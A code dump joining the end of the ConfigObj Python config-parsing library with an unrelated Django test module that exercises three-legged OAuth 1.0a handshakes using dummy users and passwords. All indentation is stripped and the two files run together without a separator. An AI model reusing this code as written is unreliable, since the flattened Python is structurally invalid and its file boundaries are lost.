quot = tdquot
else:
quot = tsquot
return quot
def _handle_value(self, value):
"""
        Given a value string: unquote it, remove any comment, and
        handle lists (including empty and single member lists).
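        Illustrative sketch::
            config._handle_value('1, 2, 3 # nums')  # -> (['1', '2', '3'], '# nums')
            config._handle_value(',')               # -> ([], None) - the empty list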
"""
if self._inspec:
# Parsing a configspec so don't handle comments
return (value, '')
# do we look for lists in values ?
if not self.list_values:
mat = self._nolistvalue.match(value)
if mat is None:
raise SyntaxError()
# NOTE: we don't unquote here
return mat.groups()
#
mat = self._valueexp.match(value)
if mat is None:
# the value is badly constructed, probably badly quoted,
# or an invalid list
raise SyntaxError()
(list_values, single, empty_list, comment) = mat.groups()
if (list_values == '') and (single is None):
# change this if you want to accept empty values
raise SyntaxError()
        # NOTE: there is no error handling from here on if the regex
        # is wrong: incorrect values will slip through
if empty_list is not None:
# the single comma - meaning an empty list
return ([], comment)
if single is not None:
# handle empty values
if list_values and not single:
# FIXME: the '' is a workaround because our regex now matches
# '' at the end of a list if it has a trailing comma
single = None
else:
single = single or '""'
single = self._unquote(single)
if list_values == '':
# not a list value
return (single, comment)
the_list = self._listvalueexp.findall(list_values)
the_list = [self._unquote(val) for val in the_list]
if single is not None:
the_list += [single]
return (the_list, comment)
def _multiline(self, value, infile, cur_index, maxline):
"""Extract the value, where we are in a multiline situation."""
quot = value[:3]
newvalue = value[3:]
single_line = self._triple_quote[quot][0]
multi_line = self._triple_quote[quot][1]
mat = single_line.match(value)
if mat is not None:
retval = list(mat.groups())
retval.append(cur_index)
return retval
elif newvalue.find(quot) != -1:
# somehow the triple quote is missing
raise SyntaxError()
#
while cur_index < maxline:
cur_index += 1
newvalue += '\n'
line = infile[cur_index]
if line.find(quot) == -1:
newvalue += line
else:
# end of multiline, process it
break
else:
# we've got to the end of the config, oops...
raise SyntaxError()
mat = multi_line.match(line)
if mat is None:
# a badly formed line
raise SyntaxError()
(value, comment) = mat.groups()
return (newvalue + value, comment, cur_index)
def _handle_configspec(self, configspec):
"""Parse the configspec."""
# FIXME: Should we check that the configspec was created with the
# correct settings ? (i.e. ``list_values=False``)
if not isinstance(configspec, ConfigObj):
try:
configspec = ConfigObj(configspec,
raise_errors=True,
file_error=True,
_inspec=True)
except ConfigObjError as e:
# FIXME: Should these errors have a reference
# to the already parsed ConfigObj ?
raise ConfigspecError('Parsing configspec failed: %s' % e)
except IOError as e:
raise IOError('Reading configspec failed: %s' % e)
self.configspec = configspec
def _set_configspec(self, section, copy):
"""
Called by validate. Handles setting the configspec on subsections
including sections to be validated by __many__
"""
configspec = section.configspec
many = configspec.get('__many__')
if isinstance(many, dict):
for entry in section.sections:
if entry not in configspec:
section[entry].configspec = many
for entry in configspec.sections:
if entry == '__many__':
continue
if entry not in section:
section[entry] = {}
section[entry]._created = True
if copy:
# copy comments
section.comments[entry] = configspec.comments.get(entry, [])
section.inline_comments[entry] = configspec.inline_comments.get(entry, '')
# Could be a scalar when we expect a section
if isinstance(section[entry], Section):
section[entry].configspec = configspec[entry]
def _write_line(self, indent_string, entry, this_entry, comment):
"""Write an individual line, for the write method"""
        # NOTE: the calls to self._quote here handle non-StringType values.
if not self.unrepr:
val = self._decode_element(self._quote(this_entry))
else:
val = repr(this_entry)
return '%s%s%s%s%s' % (indent_string,
self._decode_element(self._quote(entry, multiline=False)),
self._a_to_u(' = '),
val,
self._decode_element(comment))
def _write_marker(self, indent_string, depth, entry, comment):
"""Write a section marker line"""
return '%s%s%s%s%s' % (indent_string,
self._a_to_u('[' * depth),
self._quote(self._decode_element(entry), multiline=False),
self._a_to_u(']' * depth),
self._decode_element(comment))
def _handle_comment(self, comment):
"""Deal with a comment."""
if not comment:
return ''
start = self.indent_type
if not comment.startswith('#'):
start += self._a_to_u(' # ')
return (start + comment)
# Public methods
def write(self, outfile=None, section=None):
"""
Write the current ConfigObj as a file
tekNico: FIXME: use StringIO instead of real files
>>> filename = a.filename
>>> a.filename = 'test.ini'
>>> a.write()
>>> a.filename = filename
>>> a == ConfigObj('test.ini', raise_errors=True)
1
>>> import os
>>> os.remove('test.ini')
"""
if self.indent_type is None:
# this can be true if initialised from a dictionary
self.indent_type = DEFAULT_INDENT_TYPE
out = []
cs = self._a_to_u('#')
csp = self._a_to_u('# ')
if section is None:
int_val = self.interpolation
self.interpolation = False
section = self
for line in self.initial_comment:
line = self._decode_element(line)
stripped_line = line.strip()
if stripped_line and not stripped_line.startswith(cs):
line = csp + line
out.append(line)
indent_string = self.indent_type * section.depth
for entry in (section.scalars + section.sections):
if entry in section.defaults:
# don't write out default values
continue
for comment_line in section.comments[entry]:
comment_line = self._decode_element(comment_line.lstrip())
if comment_line and not comment_line.startswith(cs):
comment_line = csp + comment_line
out.append(indent_string + comment_line)
this_entry = section[entry]
comment = self._handle_comment(section.inline_comments[entry])
if isinstance(this_entry, Section):
# a section
out.append(self._write_marker(
indent_string,
this_entry.depth,
entry,
comment))
out.extend(self.write(section=this_entry))
else:
out.append(self._write_line(
indent_string,
entry,
this_entry,
comment))
if section is self:
for line in self.final_comment:
line = self._decode_element(line)
stripped_line = line.strip()
if stripped_line and not stripped_line.startswith(cs):
line = csp + line
out.append(line)
self.interpolation = int_val
if section is not self:
return out
if (self.filename is None) and (outfile is None):
# output a list of lines
# might need to encode
# NOTE: This will *screw* UTF16, each line will start with the BOM
if self.encoding:
out = [l.encode(self.encoding) for l in out]
if (self.BOM and ((self.encoding is None) or
(BOM_LIST.get(self.encoding.lower()) == 'utf_8'))):
# Add the UTF8 BOM
if not out:
out.append('')
out[0] = BOM_UTF8 + out[0]
return out
# Turn the list to a string, joined with correct newlines
newline = self.newlines or os.linesep
if (getattr(outfile, 'mode', None) is not None and outfile.mode == 'w'
and sys.platform == 'win32' and newline == '\r\n'):
# Windows specific hack to avoid writing '\r\r\n'
newline = '\n'
output = self._a_to_u(newline).join(out)
if not output.endswith(newline):
output += newline
if isinstance(output, six.binary_type):
output_bytes = output
else:
output_bytes = output.encode(self.encoding or
self.default_encoding or
'ascii')
if self.BOM and ((self.encoding is None) or match_utf8(self.encoding)):
# Add the UTF8 BOM
output_bytes = BOM_UTF8 + output_bytes
if outfile is not None:
outfile.write(output_bytes)
else:
with open(self.filename, 'wb') as h:
h.write(output_bytes)
def validate(self, validator, preserve_errors=False, copy=False,
section=None):
"""
Test the ConfigObj against a configspec.
It uses the ``validator`` object from *validate.py*.
To run ``validate`` on the current ConfigObj, call: ::
test = config.validate(validator)
(Normally having previously passed in the configspec when the ConfigObj
was created - you can dynamically assign a dictionary of checks to the
``configspec`` attribute of a section though).
It returns ``True`` if everything passes, or a dictionary of
pass/fails (True/False). If every member of a subsection passes, it
will just have the value ``True``. (It also returns ``False`` if all
members fail).
In addition, it converts the values from strings to their native
types if their checks pass (and ``stringify`` is set).
If ``preserve_errors`` is ``True`` (``False`` is default) then instead
        of marking a fail with a ``False``, it will preserve the actual
exception object. This can contain info about the reason for failure.
For example the ``VdtValueTooSmallError`` indicates that the value
supplied was too small. If a value (or section) is missing it will
still be marked as ``False``.
You must have the validate module to use ``preserve_errors=True``.
You can then use the ``flatten_errors`` function to turn your nested
results dictionary into a flattened list of failures - useful for
displaying meaningful error messages.
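        A sketch of a typical round trip (assumes the separate *validate.py*
        module is installed and ``config`` was created with a configspec)::
            from validate import Validator
            vtor = Validator()
            results = config.validate(vtor, preserve_errors=True)
            if results is not True:
                for sections, key, error in flatten_errors(config, results):
                    print('%s : %s : %s' % ('.'.join(sections), key, error))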
"""
if section is None:
if self.configspec is None:
raise ValueError('No configspec supplied.')
if preserve_errors:
# We do this once to remove a top level dependency on the validate module
# Which makes importing configobj faster
from validate import VdtMissingValue
self._vdtMissingValue = VdtMissingValue
section = self
if copy:
section.initial_comment = section.configspec.initial_comment
section.final_comment = section.configspec.final_comment
section.encoding = section.configspec.encoding
section.BOM = section.configspec.BOM
section.newlines = section.configspec.newlines
section.indent_type = section.configspec.indent_type
#
# section.default_values.clear() #??
configspec = section.configspec
self._set_configspec(section, copy)
def validate_entry(entry, spec, val, missing, ret_true, ret_false):
section.default_values.pop(entry, None)
try:
section.default_values[entry] = validator.get_default_value(configspec[entry])
except (KeyError, AttributeError, validator.baseErrorClass):
# No default, bad default or validator has no 'get_default_value'
# (e.g. SimpleVal)
pass
try:
check = validator.check(spec,
val,
missing=missing
)
except validator.baseErrorClass as e:
if not preserve_errors or isinstance(e, self._vdtMissingValue):
out[entry] = False
else:
# preserve the error
out[entry] = e
ret_false = False
ret_true = False
else:
ret_false = False
out[entry] = True
if self.stringify or missing:
# if we are doing type conversion
# or the value is a supplied default
if not self.stringify:
if isinstance(check, (list, tuple)):
# preserve lists
check = [self._str(item) for item in check]
elif missing and check is None:
# convert the None from a default to a ''
check = ''
else:
check = self._str(check)
if (check != val) or missing:
section[entry] = check
if not copy and missing and entry not in section.defaults:
section.defaults.append(entry)
return ret_true, ret_false
#
out = {}
ret_true = True
ret_false = True
unvalidated = [k for k in section.scalars if k not in configspec]
incorrect_sections = [k for k in configspec.sections if k in section.scalars]
incorrect_scalars = [k for k in configspec.scalars if k in section.sections]
for entry in configspec.scalars:
if entry in ('__many__', '___many___'):
# reserved names
continue
if (not entry in section.scalars) or (entry in section.defaults):
# missing entries
# or entries from defaults
missing = True
val = None
if copy and entry not in section.scalars:
# copy comments
section.comments[entry] = (
configspec.comments.get(entry, []))
section.inline_comments[entry] = (
configspec.inline_comments.get(entry, ''))
#
else:
missing = False
val = section[entry]
ret_true, ret_false = validate_entry(entry, configspec[entry], val,
missing, ret_true, ret_false)
many = None
if '__many__' in configspec.scalars:
many = configspec['__many__']
elif '___many___' in configspec.scalars:
many = configspec['___many___']
if many is not None:
for entry in unvalidated:
val = section[entry]
ret_true, ret_false = validate_entry(entry, many, val, False,
ret_true, ret_false)
unvalidated = []
for entry in incorrect_scalars:
ret_true = False
if not preserve_errors:
out[entry] = False
else:
ret_false = False
msg = 'Value %r was provided as a section' % entry
out[entry] = validator.baseErrorClass(msg)
for entry in incorrect_sections:
ret_true = False
if not preserve_errors:
out[entry] = False
else:
ret_false = False
msg = 'Section %r was provided as a single value' % entry
out[entry] = validator.baseErrorClass(msg)
# Missing sections will have been created as empty ones when the
# configspec was read.
for entry in section.sections:
# FIXME: this means DEFAULT is not copied in copy mode
if section is self and entry == 'DEFAULT':
continue
if section[entry].configspec is None:
unvalidated.append(entry)
continue
if copy:
section.comments[entry] = configspec.comments.get(entry, [])
section.inline_comments[entry] = configspec.inline_comments.get(entry, '')
check = self.validate(validator, preserve_errors=preserve_errors, copy=copy, section=section[entry])
out[entry] = check
if check == False:
ret_true = False
elif check == True:
ret_false = False
else:
ret_true = False
section.extra_values = unvalidated
if preserve_errors and not section._created:
# If the section wasn't created (i.e. it wasn't missing)
# then we can't return False, we need to preserve errors
ret_false = False
#
if ret_false and preserve_errors and out:
# If we are preserving errors, but all
# the failures are from missing sections / values
# then we can return False. Otherwise there is a
# real failure that we need to preserve.
ret_false = not any(out.values())
if ret_true:
return True
elif ret_false:
return False
return out
def reset(self):
"""Clear ConfigObj instance and restore to 'freshly created' state."""
self.clear()
self._initialise()
# FIXME: Should be done by '_initialise', but ConfigObj constructor (and reload)
# requires an empty dictionary
self.configspec = None
# Just to be sure ;-)
self._original_configspec = None
def reload(self):
"""
Reload a ConfigObj from file.
This method raises a ``ReloadError`` if the ConfigObj doesn't have
a filename attribute pointing to a file.
"""
if not isinstance(self.filename, six.string_types):
raise ReloadError()
filename = self.filename
current_options = {}
for entry in OPTION_DEFAULTS:
if entry == 'configspec':
continue
current_options[entry] = getattr(self, entry)
configspec = self._original_configspec
current_options['configspec'] = configspec
self.clear()
self._initialise(current_options)
self._load(filename, configspec)
class SimpleVal(object):
"""
A simple validator.
Can be used to check that all members expected are present.
To use it, provide a configspec with all your members in (the value given
will be ignored). Pass an instance of ``SimpleVal`` to the ``validate``
method of your ``ConfigObj``. ``validate`` will return ``True`` if all
members are present, or a dictionary with True/False meaning
present/missing. (Whole missing sections will be replaced with ``False``)
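    A minimal sketch of its use::
        val = SimpleVal()
        test = config.validate(val)
        if test is not True:
            print('Missing members: %s'
                  % [k for (k, passed) in test.items() if passed is False])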
"""
def __init__(self):
self.baseErrorClass = ConfigObjError
def check(self, check, member, missing=False):
"""A dummy check method, always returns the value unchanged."""
if missing:
raise self.baseErrorClass()
return member
def flatten_errors(cfg, res, levels=None, results=None):
"""
An example function that will turn a nested dictionary of results
(as returned by ``ConfigObj.validate``) into a flat list.
``cfg`` is the ConfigObj instance being checked, ``res`` is the results
dictionary returned by ``validate``.
(This is a recursive function, so you shouldn't use the ``levels`` or
``results`` arguments - they are used by the function.)
Returns a list of keys that failed. Each member of the list is a tuple::
([list of sections...], key, result)
If ``validate`` was called with ``preserve_errors=False`` (the default)
then ``result`` will always be ``False``.
*list of sections* is a flattened list of sections that the key was found
in.
If the section was missing (or a section was expected and a scalar provided
- or vice-versa) then key will be ``None``.
If the value (or section) was missing then ``result`` will be ``False``.
If ``validate`` was called with ``preserve_errors=True`` and a value
was present, but failed the check, then ``result`` will be the exception
object returned. You can use this as a string that describes the failure.
For example *The value "3" is of the wrong type*.
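    Illustrative shape of the returned list (section and key names are
    hypothetical; the exception type comes from the validate module)::
        [([], 'top_level_key', False),
         (['section', 'sub'], 'port', VdtTypeError(...))]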
"""
if levels is None:
# first time called
levels = []
results = []
if res == True:
return sorted(results)
if res == False or isinstance(res, Exception):
results.append((levels[:], None, res))
if levels:
levels.pop()
return sorted(results)
for (key, val) in list(res.items()):
if val == True:
continue
if isinstance(cfg.get(key), dict):
# Go down one level
levels.append(key)
flatten_errors(cfg[key], val, levels, results)
continue
results.append((levels[:], key, val))
#
# Go up one level
if levels:
levels.pop()
#
return sorted(results)
def get_extra_values(conf, _prepend=()):
"""
Find all the values and sections not in the configspec from a validated
ConfigObj.
``get_extra_values`` returns a list of tuples where each tuple represents
either an extra section, or an extra value.
The tuples contain two values, a tuple representing the section the value
is in and the name of the extra values. For extra values in the top level
section the first member will be an empty tuple. For values in the 'foo'
section the first member will be ``('foo',)``. For members in the 'bar'
subsection of the 'foo' section the first member will be ``('foo', 'bar')``.
NOTE: If you call ``get_extra_values`` on a ConfigObj instance that hasn't
been validated it will return an empty list.
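    Illustrative shape of the result (names are hypothetical)::
        [((), 'top_level_extra'),
         (('foo',), 'extra_in_foo'),
         (('foo', 'bar'), 'extra_in_foo_bar')]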
"""
out = []
out.extend([(_prepend, name) for name in conf.extra_values])
for name in conf.sections:
if name not in conf.extra_values:
out.extend(get_extra_values(conf[name], _prepend + (name,)))
return out
"""*A programming language is a medium of expression.* - Paul Graham"""
import uuid
import json
import urllib
import os
import base64
import time
import string
import random
import oauth2 as oauth
from Crypto.PublicKey import RSA
from django.conf import settings
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.test import TestCase
from ..views import reg_client, register, statements
from ..models import Activity, Agent
from oauth_provider.models import Consumer, Token, Nonce
from oauth_provider.utils import SignatureMethod_RSA_SHA1
# Django client uses testserver
TEST_SERVER = 'http://testserver'
INITIATE_ENDPOINT = TEST_SERVER + "/XAPI/OAuth/initiate"
AUTHORIZATION_ENDPOINT = TEST_SERVER + "/XAPI/OAuth/authorize"
TOKEN_ENDPOINT = TEST_SERVER + "/XAPI/OAuth/token"
class OAuthTests(TestCase):
@classmethod
def setUpClass(cls):
print "\n%s" % __name__
def setUp(self):
if not settings.OAUTH_ENABLED:
settings.OAUTH_ENABLED = True
# Create a user
self.user = User.objects.create_user('jane', '[email protected]', 'toto')
self.client.login(username='jane', password='toto')
#Register a consumer
self.name = "test jane client"
self.desc = "test jane client desc"
form = {"name":self.name, "description":self.desc}
self.client.post(reverse(reg_client),form)
self.consumer = Consumer.objects.get(name=self.name)
self.name2jane = "test jane client2"
self.desc2jane = "test jane client desc2"
form2jane = {"name":self.name2jane, "description":self.desc2jane}
self.client.post(reverse(reg_client),form2jane)
self.consumer2jane = Consumer.objects.get(name=self.name2jane)
self.client.logout()
self.jane_auth = "Basic %s" % base64.b64encode("%s:%s" % ('jane','toto'))
# Create a user
self.user2 = User.objects.create_user('dick', '[email protected]', 'lassie')
self.client.login(username='dick', password='lassie')
#Register a client
self.name2 = "test client2"
self.desc2 = "test desc2"
form2 = {"name":self.name2, "description":self.desc2}
self.client.post(reverse(reg_client),form2)
self.consumer2 = Consumer.objects.get(name=self.name2)
self.client.logout()
self.dick_auth = "Basic %s" % base64.b64encode("%s:%s" % ('dick','lassie'))
def tearDown(self):
if settings.OAUTH_ENABLED:
settings.OAUTH_ENABLED = False
# Delete everything
Token.objects.all().delete()
Consumer.objects.all().delete()
Nonce.objects.all().delete()
User.objects.all().delete()
attach_folder_path = os.path.join(settings.MEDIA_ROOT, "activity_state")
for the_file in os.listdir(attach_folder_path):
file_path = os.path.join(attach_folder_path, the_file)
try:
os.unlink(file_path)
            except Exception as e:
raise e
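    # The handshake helpers below walk the full three-legged OAuth 1.0a flow:
    # fetch a temporary request token from INITIATE_ENDPOINT, authorize it as
    # a logged-in user at AUTHORIZATION_ENDPOINT, trade it for an access token
    # at TOKEN_ENDPOINT, then return the resource-request header parameters
    # (minus the signature, which each caller computes per request).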
def oauth_handshake(self, scope=True, scope_type=None, parameters=None, param_type='qs', change_scope=[],
request_nonce='', access_nonce='', resource_nonce='', consumer=None):
# ============= INITIATE =============
if not request_nonce:
request_nonce = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(6))
if not consumer:
consumer = self.consumer
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"HMAC-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"%s\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/access_token_ready\"" % (consumer.key,str(int(time.time())), request_nonce)
# Add non oauth parameters appropriately
request_token_params = {}
if parameters:
request_token_params = parameters
# Set scope
if scope:
if scope_type:
request_token_params['scope'] = scope_type
else:
request_token_params['scope'] = "all"
# Add non oauth params in query string or form
if param_type == 'qs':
request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(request_token_params))
else:
request_token_path = INITIATE_ENDPOINT
# Make the params into a dict to pass into from_consumer_and_token
oauth_header_request_token_params_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in oauth_header_request_token_params_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# get_oauth_request in views ignores realm, must remove so not input to from_token_and_callback
del oauth_header_request_token_params_dict['OAuth realm']
# Make oauth request depending on where the parameters are
if param_type == 'qs':
oauth_request = oauth.Request.from_consumer_and_token(consumer, token=None, http_method='GET',
http_url=request_token_path, parameters=oauth_header_request_token_params_dict)
else:
oauth_request = oauth.Request.from_consumer_and_token(consumer, token=None, http_method='POST',
http_url=request_token_path, parameters=dict(oauth_header_request_token_params_dict.items()+request_token_params.items()))
# create signature and add it to the header params
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, consumer, None)
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
# Send request depending on the parameters
if param_type == 'qs':
request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params)
else:
request_resp = self.client.post(request_token_path, Authorization=oauth_header_request_token_params, data=request_token_params,
content_type="application/x-www-form-urlencoded")
# Get request token (will be only token for that user)
self.assertEqual(request_resp.status_code, 200)
self.assertIn('oauth_token_secret', request_resp.content)
self.assertIn('oauth_token', request_resp.content)
self.assertIn('oauth_callback_confirmed', request_resp.content)
token_secret = request_resp.content.split('&')[0].split('=')[1]
request_token = Token.objects.get(secret=token_secret)
# ============= END INITIATE =============
# ============= AUTHORIZE =============
# Create authorize path, must have oauth_token param
authorize_param = {'oauth_token': request_token.key}
authorize_path = "%s?%s" % (AUTHORIZATION_ENDPOINT, urllib.urlencode(authorize_param))
# Try to hit auth path, made to login
auth_resp = self.client.get(authorize_path)
self.assertEqual(auth_resp.status_code, 302)
self.assertIn('http://testserver/accounts/login?next=/XAPI/OAuth/authorize%3F', auth_resp['Location'])
self.assertIn(request_token.key, auth_resp['Location'])
self.client.login(username='jane', password='toto')
self.assertEqual(request_token.is_approved, False)
# After being redirected to login and logging in again, try get again
auth_resp = self.client.get(authorize_path)
        self.assertEqual(auth_resp.status_code, 200) # Should display the OAuth authorize view
# Get the form, set required fields
auth_form = auth_resp.context['form']
data = auth_form.initial
data['authorize_access'] = 1
data['oauth_token'] = request_token.key
# Change scope if wanted
if change_scope:
data['scope'] = change_scope
# Post data back to auth endpoint - should redirect to callback_url we set in oauth headers with request token
auth_post = self.client.post(AUTHORIZATION_ENDPOINT, data)
self.assertEqual(auth_post.status_code, 302)
# Check if oauth_verifier and oauth_token are returned
self.assertIn('http://example.com/access_token_ready?oauth_verifier=', auth_post['Location'])
self.assertIn('oauth_token=', auth_post['Location'])
# Get token again just to make sure
token_key = auth_post['Location'].split('?')[1].split('&')[1].split('=')[1]
request_token_after_auth = Token.objects.get(key=token_key)
self.assertIn(request_token_after_auth.key, auth_post['Location'])
self.assertEqual(request_token_after_auth.is_approved, True)
# ============= END AUTHORIZE =============
# ============= ACCESS TOKEN =============
if not access_nonce:
access_nonce = "access_nonce"
# Set verifier in access_token params and create new oauth request
oauth_header_access_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_token=\"%s\","\
"oauth_signature_method=\"HMAC-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"%s\","\
"oauth_version=\"1.0\","\
"oauth_verifier=\"%s\"" % (consumer.key, request_token_after_auth.key, str(int(time.time())), access_nonce, request_token_after_auth.verifier)
# from_token_and_callback takes a dictionary
param_list = oauth_header_access_token_params.split(",")
oauth_header_access_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_access_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_access_params_dict['OAuth realm']
oauth_request = oauth.Request.from_token_and_callback(request_token_after_auth, http_method='GET',
http_url=TOKEN_ENDPOINT, parameters=oauth_header_access_params_dict)
# Create signature and add it to the headers
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, consumer, request_token_after_auth)
oauth_header_access_token_params += ',oauth_signature="%s"' % signature
# Get access token
access_resp = self.client.get(TOKEN_ENDPOINT, Authorization=oauth_header_access_token_params)
self.assertEqual(access_resp.status_code, 200)
content = access_resp.content.split('&')
access_token_secret = content[0].split('=')[1]
access_token_key = content[1].split('=')[1]
access_token = Token.objects.get(secret=access_token_secret, key=access_token_key)
# ============= END ACCESS TOKEN =============
if not resource_nonce:
resource_nonce = "resource_nonce"
        # Set the OAuth headers the user will use when hitting the XAPI endpoint with the access token
oauth_header_resource_params = "OAuth realm=\"test\", "\
"oauth_consumer_key=\"%s\","\
"oauth_token=\"%s\","\
"oauth_signature_method=\"HMAC-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"%s\","\
"oauth_version=\"1.0\"" % (consumer.key, access_token.key, str(int(time.time())), resource_nonce)
self.client.logout()
return oauth_header_resource_params, access_token
def oauth_handshake2(self, scope=True, scope_type=None, parameters=None, param_type='qs', change_scope=[],
request_nonce='', access_nonce='', resource_nonce=''):
# ============= INITIATE =============
if not request_nonce:
request_nonce = "request_nonce2"
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"HMAC-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"%s\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/access_token_ready\"" % (self.consumer2.key,str(int(time.time())), request_nonce)
# Add non oauth parameters appropriately
request_token_params = {}
if parameters:
request_token_params = parameters
if scope:
if scope_type:
request_token_params['scope'] = scope_type
else:
request_token_params['scope'] = "all"
if param_type == 'qs':
request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(request_token_params))
else:
request_token_path = INITIATE_ENDPOINT
# Make the params into a dict to pass into from_consumer_and_token
oauth_header_request_token_params_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in oauth_header_request_token_params_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# get_oauth_request in views ignores realm, must remove so not input to from_token_and_callback
del oauth_header_request_token_params_dict['OAuth realm']
if param_type == 'qs':
oauth_request = oauth.Request.from_consumer_and_token(self.consumer2, token=None, http_method='GET',
http_url=request_token_path, parameters=oauth_header_request_token_params_dict)
else:
oauth_request = oauth.Request.from_consumer_and_token(self.consumer2, token=None, http_method='POST',
http_url=request_token_path, parameters=dict(oauth_header_request_token_params_dict.items()+request_token_params.items()))
# create signature and add it to the header params
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer2, None)
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
if param_type == 'qs':
request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params)
else:
request_resp = self.client.post(request_token_path, Authorization=oauth_header_request_token_params, data=request_token_params,
content_type="application/x-www-form-urlencoded")
self.assertEqual(request_resp.status_code, 200)
self.assertIn('oauth_token_secret', request_resp.content)
self.assertIn('oauth_token', request_resp.content)
self.assertIn('oauth_callback_confirmed', request_resp.content)
request_token = Token.objects.get(consumer=self.consumer2)
# ============= END INITIATE =============
# ============= AUTHORIZE =============
authorize_param = {'oauth_token': request_token.key}
authorize_path = "%s?%s" % (AUTHORIZATION_ENDPOINT, urllib.urlencode(authorize_param))
auth_resp = self.client.get(authorize_path)
self.assertEqual(auth_resp.status_code, 302)
self.assertIn('http://testserver/accounts/login?next=/XAPI/OAuth/authorize%3F', auth_resp['Location'])
self.assertIn(request_token.key, auth_resp['Location'])
self.client.login(username='dick', password='lassie')
self.assertEqual(request_token.is_approved, False)
# After being redirected to login and logging in again, try get again
auth_resp = self.client.get(authorize_path)
        self.assertEqual(auth_resp.status_code, 200) # Should display the OAuth authorize view
auth_form = auth_resp.context['form']
data = auth_form.initial
data['authorize_access'] = 1
data['oauth_token'] = request_token.key
# Change scope if wanted
if change_scope:
data['scope'] = change_scope
auth_post = self.client.post(AUTHORIZATION_ENDPOINT, data)
self.assertEqual(auth_post.status_code, 302)
# Check if oauth_verifier and oauth_token are returned
self.assertIn('http://example.com/access_token_ready?oauth_verifier=', auth_post['Location'])
self.assertIn('oauth_token=', auth_post['Location'])
request_token_after_auth = Token.objects.get(consumer=self.consumer2)
self.assertIn(request_token_after_auth.key, auth_post['Location'])
self.assertEqual(request_token_after_auth.is_approved, True)
# ============= END AUTHORIZE =============
# ============= ACCESS TOKEN =============
if not access_nonce:
access_nonce = "access_nonce2"
oauth_header_access_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_token=\"%s\","\
"oauth_signature_method=\"HMAC-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"%s\","\
"oauth_version=\"1.0\","\
"oauth_verifier=\"%s\"" % (self.consumer2.key, request_token_after_auth.key, str(int(time.time())), access_nonce, request_token_after_auth.verifier)
# from_token_and_callback takes a dictionary
param_list = oauth_header_access_token_params.split(",")
oauth_header_access_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_access_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_access_params_dict['OAuth realm']
oauth_request = oauth.Request.from_token_and_callback(request_token_after_auth, http_method='GET',
http_url=TOKEN_ENDPOINT, parameters=oauth_header_access_params_dict)
# Create signature and add it to the headers
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer2, request_token_after_auth)
oauth_header_access_token_params += ',oauth_signature="%s"' % signature
access_resp = self.client.get(TOKEN_ENDPOINT, Authorization=oauth_header_access_token_params)
self.assertEqual(access_resp.status_code, 200)
content = access_resp.content.split('&')
access_token_secret = content[0].split('=')[1]
access_token_key = content[1].split('=')[1]
access_token = Token.objects.get(secret=access_token_secret, key=access_token_key)
# ============= END ACCESS TOKEN =============
if not resource_nonce:
resource_nonce = "resource_nonce2"
oauth_header_resource_params = "OAuth realm=\"test\", "\
"oauth_consumer_key=\"%s\","\
"oauth_token=\"%s\","\
"oauth_signature_method=\"HMAC-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"%s\","\
"oauth_version=\"1.0\"" % (self.consumer2.key, access_token.key, str(int(time.time())), resource_nonce)
self.client.logout()
return oauth_header_resource_params, access_token
def test_request_token_missing_headers(self):
# Missing signature method
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key,str(int(time.time())))
# Make string params into dictionary for from_consumer_and_token function
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# Create OAuth request and signature
oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET',
http_url=INITIATE_ENDPOINT, parameters=oauth_header_request_token_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, None)
# Append signature to string headers
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
resp = self.client.get(INITIATE_ENDPOINT)
self.assertEqual(resp.status_code, 400)
